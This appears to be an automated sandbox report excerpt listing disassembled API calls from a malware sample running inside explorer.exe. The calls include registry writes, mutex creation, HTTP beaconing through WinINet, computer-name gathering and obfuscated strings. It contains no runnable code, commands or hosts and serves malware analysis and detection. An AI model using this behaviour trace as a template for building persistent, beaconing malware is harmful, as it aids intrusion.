                                                    • Part of subcall function 032061F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 032064E3
                                                    • Part of subcall function 032061F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 03206511
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(80000001), ref: 0320651A
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0320663C
                                                    • Part of subcall function 032061F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0320665F
                                                    • Part of subcall function 032061F0: RegCloseKey.ADVAPI32(80000002), ref: 03206668
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: CloseNameOpen$Value$User$AccountAuthorityFileIdentifierLookupModuleQuery
                                                  • String ID: 246122658369$8a680c$NI5CJv==$System$V$YNJa$YNZa$Ycla$Zw1a$aMRa$bSda$bTNa$bxZa$c 1=$cSRa$cwNa$dM5a$ddNa
                                                  • API String ID: 4106312383-458430745
                                                  • Opcode ID: e2a7863294dca71ad95b3097127b2e2eb960cfb8a258fef79720caba3d25766e
                                                  • Instruction ID: cb3e8ec39e4e655dd2cbe8e0b9995d0060be32e8e4115621b031cd83d3f88c64
                                                  • Opcode Fuzzy Hash: e2a7863294dca71ad95b3097127b2e2eb960cfb8a258fef79720caba3d25766e
                                                  • Instruction Fuzzy Hash: AFD20571921268ABEB29D728CE8879DFE769F81304F50C2D8D048AB2D6DB754FC48F51

                                                  APIs
                                                  • Sleep.KERNELBASE(000005DC,74D40A26,?,00000000), ref: 03210642
                                                  • InternetOpenW.WININET(0325DB50,00000000,00000000,00000000,00000000), ref: 03210651
                                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 03210675
                                                  • HttpOpenRequestA.WININET(?,00000000), ref: 032106BF
                                                  • HttpSendRequestA.WININET(?,00000000), ref: 0321077F
                                                  • InternetReadFile.WININET(?,?,000003FF,?), ref: 03210831
                                                  • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 032108E0
                                                  • InternetCloseHandle.WININET(?), ref: 03210907
                                                  • InternetCloseHandle.WININET(?), ref: 0321090F
                                                  • InternetCloseHandle.WININET(?), ref: 03210917
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                                                  • String ID: Uu YSv==$axS5 CIZPzb=$axS5 ykoPx==$invalid stoi argument$stoi argument out of range
                                                  • API String ID: 1439999335-2146650194
                                                  • Opcode ID: 8504c0b66ee2d4a6319b6bedcde23fc680ef000c6d3e1fe75579ba5d160320f4
                                                  • Instruction ID: 4af1af19a340ac8fcfd2098e9e3e9ed8bda6f8eef629bc5b8f985ea02e7c73a5
                                                  • Opcode Fuzzy Hash: 8504c0b66ee2d4a6319b6bedcde23fc680ef000c6d3e1fe75579ba5d160320f4
                                                  • Instruction Fuzzy Hash: 69B118B1A202189FDB24DF28CD84B9EBBB9EF45304F4081A8F509972C1DB719AD4CF95

                                                  APIs
                                                  • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0323EE50,?,?,00000000), ref: 0323ECA1
                                                  • _free.LIBCMT ref: 0323EC8F
                                                    • Part of subcall function 032381B6: HeapFree.KERNEL32(00000000,00000000,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?), ref: 032381CC
                                                    • Part of subcall function 032381B6: GetLastError.KERNEL32(?,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?,?), ref: 032381DE
                                                  • _free.LIBCMT ref: 0323EE59
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                  • API String ID: 2155170405-239921721
                                                  • Opcode ID: 53e9b0cd8d5a6095fc7f2c486994651547a9e3e33af69beaaa0c356c990f288c
                                                  • Instruction ID: 91143b2c6cf5aad0c07a072d7b50627405b07f11b4e92b37cc83e2c0ce506366
                                                  • Opcode Fuzzy Hash: 53e9b0cd8d5a6095fc7f2c486994651547a9e3e33af69beaaa0c356c990f288c
                                                  • Instruction Fuzzy Hash: 7D5109B7821325ABCB10FF64DD4599EBB78EF02620F158156E514AB190EB709EC4CBD0

                                                  APIs
                                                  • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0323073E), ref: 0323082E
                                                  • GetFileInformationByHandle.KERNELBASE(?,?), ref: 03230888
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0323073E,?,000000FF,00000000,00000000), ref: 03230916
                                                  • __dosmaperr.LIBCMT ref: 0323091D
                                                  • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0323095A
                                                    • Part of subcall function 03230B82: __dosmaperr.LIBCMT ref: 03230BB7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                  • String ID:
                                                  • API String ID: 1206951868-0
                                                  • Opcode ID: e253a6ef00f016510ebed160c6f259b9ab2cc22a366ad6de2430a0b4075f56ac
                                                  • Instruction ID: 871a0e5e4b13112088059755c3450fff8c7e297ddd64dad9adee9302fd25932b
                                                  • Opcode Fuzzy Hash: e253a6ef00f016510ebed160c6f259b9ab2cc22a366ad6de2430a0b4075f56ac
                                                  • Instruction Fuzzy Hash: BE417FB6920349AFDF24EFB5D844AAFBBF9EF49610B04841DE557D7210E730A991CB20

                                                  Control-flow Graph (graph rendering omitted; function entry block at 0320C6D0)
                                                  APIs
                                                  • Sleep.KERNELBASE(00000096), ref: 0320C6D6
                                                  • CreateMutexA.KERNELBASE(00000000,00000000,03267494), ref: 0320C6F4
                                                  • GetLastError.KERNEL32 ref: 0320C6FC
                                                  • GetLastError.KERNEL32 ref: 0320C70D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateMutexSleep
                                                  • String ID:
                                                  • API String ID: 3645482037-0
                                                  • Opcode ID: 61dcffb7e3202cd49dfcb70d2da5a4fe1bc50b32db1496ed1f32b66e487026bd
                                                  • Instruction ID: d85730f1e4eb32fbf89e225186809e78b4c5130ca6b666d11a3bd46f44e44baa
                                                  • Opcode Fuzzy Hash: 61dcffb7e3202cd49dfcb70d2da5a4fe1bc50b32db1496ed1f32b66e487026bd
                                                  • Instruction Fuzzy Hash: 97E0D871104340EBEB507B6DF44C70E3A2ADB80761F148510EE19CA1CEC77158C08611

                                                  Control-flow Graph (graph rendering omitted; function entry block at 0323ED89)
                                                  APIs
                                                  • _free.LIBCMT ref: 0323EE59
                                                    • Part of subcall function 0323EC2F: _free.LIBCMT ref: 0323EC8F
                                                    • Part of subcall function 0323EC2F: GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0323EE50,?,?,00000000), ref: 0323ECA1
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 597776487-0
                                                  • Opcode ID: e2cee9fd6c1569cf2fe2d46c10f6de3e56d5f18ea7e53bfdb5252c4ef2723606
                                                  • Instruction ID: 7b5de7bd501be59a870fcc51f3eba6da85d7666beba7c495eb5c040b74ca78a8
                                                  • Opcode Fuzzy Hash: e2cee9fd6c1569cf2fe2d46c10f6de3e56d5f18ea7e53bfdb5252c4ef2723606
                                                  • Instruction Fuzzy Hash: 6C21DAF783131956CB20FA249C4899B777C9F82630F164299E965AB281EF70DECC8590

                                                  Control-flow Graph (graph rendering omitted; function entry block at 032306A4)
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ff9413ea9842f0c4fcf23204a58193b95c5d13a1502384d15ca22ff827f9757
                                                  • Instruction ID: 939365b24e68674c74f18c24b926bba3670bc92f31cbe17e45416bc0f1ce55c5
                                                  • Opcode Fuzzy Hash: 2ff9413ea9842f0c4fcf23204a58193b95c5d13a1502384d15ca22ff827f9757
                                                  • Instruction Fuzzy Hash: E62108B1910318BAEF11FB689C45BAE37299F42774F108310F9356F1D0D7B0AE519A71

                                                  Control-flow Graph (graph rendering omitted; function entry block at 03236952)
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 0323699E
                                                  • GetFileType.KERNELBASE(00000000), ref: 032369B0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID:
                                                  • API String ID: 3000768030-0
                                                  • Opcode ID: 490dccad30ca8f1fb075678fbd44de1071aff92829cef957301e059e5622d176
                                                  • Instruction ID: f6fd0cf6c524ef67723de60ad92094a40f1e36b18970e95815232d6ef0ba9d4e
                                                  • Opcode Fuzzy Hash: 490dccad30ca8f1fb075678fbd44de1071aff92829cef957301e059e5622d176
                                                  • Instruction Fuzzy Hash: 8A11B4B1124743AACB30CA3E8CDC622FAACAB57131B2C079AD0B6D65F1C770E5D58240

                                                  Control-flow Graph (graph rendering omitted; function entry block at 0323097C)
                                                  APIs
                                                  • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,032308B3,?,?,00000000,00000000), ref: 032309AA
                                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,032308B3,?,?,00000000,00000000), ref: 032309BE
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Time$System$FileLocalSpecific
                                                  • String ID:
                                                  • API String ID: 1707611234-0
                                                  • Opcode ID: c296ed00d7140142aca33aa7bd638e6be678bc9cf0930217fa8cdf9f8e943787
                                                  • Instruction ID: 869186e72abee4b6d9da1eba64e4345b59e80480f1f613bcb318c4424b20dce2
                                                  • Opcode Fuzzy Hash: c296ed00d7140142aca33aa7bd638e6be678bc9cf0930217fa8cdf9f8e943787
                                                  • Instruction Fuzzy Hash: 23111CB291020DABDF00DE95C984ADFB7BCAF49610F148266E516E6180EB70EB94CB71

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0320C6D0: Sleep.KERNELBASE(00000096), ref: 0320C6D6
                                                    • Part of subcall function 0320C6D0: CreateMutexA.KERNELBASE(00000000,00000000,03267494), ref: 0320C6F4
                                                    • Part of subcall function 0320C6D0: GetLastError.KERNEL32 ref: 0320C6FC
                                                    • Part of subcall function 0320C6D0: GetLastError.KERNEL32 ref: 0320C70D
                                                    • Part of subcall function 0321F4B0: RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0321F592
                                                    • Part of subcall function 0321F4B0: RegCloseKey.KERNELBASE(80000002), ref: 0321F5A8
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 032067BD
                                                    • Part of subcall function 032061F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 03206894
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00020CF0,00000000,00000000,00000000), ref: 03220D90
                                                  • Sleep.KERNELBASE(00007530), ref: 03220DA5
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: CreateErrorLastOpenSleep$CloseInfoMutexQueryThread
                                                  • String ID:
                                                  • API String ID: 2150463253-0
                                                  • Opcode ID: 176b4a178ee8b0c706ce2b2652ec9d56fefb726450e943c666d69f6278037816
                                                  • Instruction ID: 88779dc935694c6333c0133d6af75baa005dcf645cd726222c9cc608a6325546
                                                  • Opcode Fuzzy Hash: 176b4a178ee8b0c706ce2b2652ec9d56fefb726450e943c666d69f6278037816
                                                  • Instruction Fuzzy Hash: 9EE086396F432477E220B7A15D0AB5D3D449B14B51F544200A7192D0C29DE435E045EB

                                                  Control-flow Graph (graph rendering omitted; function entry block at 0320B250)
                                                  APIs
                                                  • GetComputerNameExW.KERNEL32(00000002,?,?,74D40A26,774D0F00), ref: 0320B2A6
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ComputerName
                                                  • String ID:
                                                  • API String ID: 3545744682-0
                                                  • Opcode ID: 7a4c56a5a02b8f3467acdf78a7a6f79a98b48e8b755c843950a09f9cc817ca89
                                                  • Instruction ID: 4544553209e309fdc2a483993daeeedab48fdd8c587c4d3787d76e4947672598
                                                  • Opcode Fuzzy Hash: 7a4c56a5a02b8f3467acdf78a7a6f79a98b48e8b755c843950a09f9cc817ca89
                                                  • Instruction Fuzzy Hash: 5D518E759112299BCB20DF68DC88BDDB7B8AB58310F1406D9D819A7291DB74ABC4CF90
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
                                                  • Instruction ID: 02cd8ea6a224e3a3b2778142850ebce76bb5ff0279ce6296daea34a6da669147
                                                  • Opcode Fuzzy Hash: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
                                                  • Instruction Fuzzy Hash: 3701A7B2C24319BEDF01EFA89C017DD7FF4AF85210F148166E819EA1D4EAB086C4DB95
                                                  APIs
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,74D40A26,74D40A26), ref: 0320639C
                                                    • Part of subcall function 032061F0: RegQueryValueExA.KERNELBASE(74D40A26,?,00000000,00000000,?,00000400,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063CA
                                                    • Part of subcall function 032061F0: RegCloseKey.KERNELBASE(74D40A26,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063D6
                                                  • Sleep.KERNELBASE ref: 03220D75
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQuerySleepValue
                                                  • String ID:
                                                  • API String ID: 4119054056-0
                                                  • Opcode ID: 53db4406d94b540dc30c6b092d3bb5581100c730703f67301bcbb16733aac183
                                                  • Instruction ID: 9c4bb435836f29d604375ef3409e060ce749b5d848210b45335f58dbf1509303
                                                  • Opcode Fuzzy Hash: 53db4406d94b540dc30c6b092d3bb5581100c730703f67301bcbb16733aac183
                                                  • Instruction Fuzzy Hash: 2CF0A479A20714BBC700FB6CDD06B0DBFB4EB06A60F444358E8216B3D7EAB51A5447D2
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 032293F3
                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 03229401
                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03229412
                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 03229423
                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03229434
                                                  • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 03229445
                                                  • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 03229456
                                                  • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 03229467
                                                  • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 03229478
                                                  • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 03229489
                                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0322949A
                                                  • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 032294AB
                                                  • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 032294BC
                                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 032294CD
                                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 032294DE
                                                  • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 032294EF
                                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 03229500
                                                  • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 03229511
                                                  • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 03229522
                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 03229533
                                                  • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 03229544
                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 03229555
                                                  • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 03229566
                                                  • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 03229577
                                                  • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 03229588
                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 03229599
                                                  • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 032295AA
                                                  • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 032295BB
                                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 032295CC
                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 032295DD
                                                  • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 032295EE
                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 032295FF
                                                  • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 03229610
                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 03229621
                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 03229632
                                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 03229643
                                                  • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 03229654
                                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 03229665
                                                  • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 03229676
                                                  • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 03229687
                                                  • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 03229698
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
